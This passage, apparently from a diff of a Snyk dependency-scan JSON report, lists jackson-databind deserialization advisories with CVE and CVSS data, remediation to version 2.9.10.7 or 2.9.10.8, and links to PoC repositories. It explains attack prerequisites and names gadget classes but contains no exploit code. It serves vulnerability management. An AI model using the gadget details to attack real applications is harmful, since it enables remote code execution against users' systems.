data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2854)\n- [GitHub Release](https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1916633)\n", + "epssDetails": { + "percentile": "0.74700", + "probability": "0.00431", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-20190" + ], + "CWE": [ + "CWE-502", + "CWE-918" + ], + "GHSA": [ + "GHSA-5949-rw7g-wx7w" + ], + "RHSA": [ + "RHSA-1610966837463990" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-18T12:50:16.466618Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-16T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not 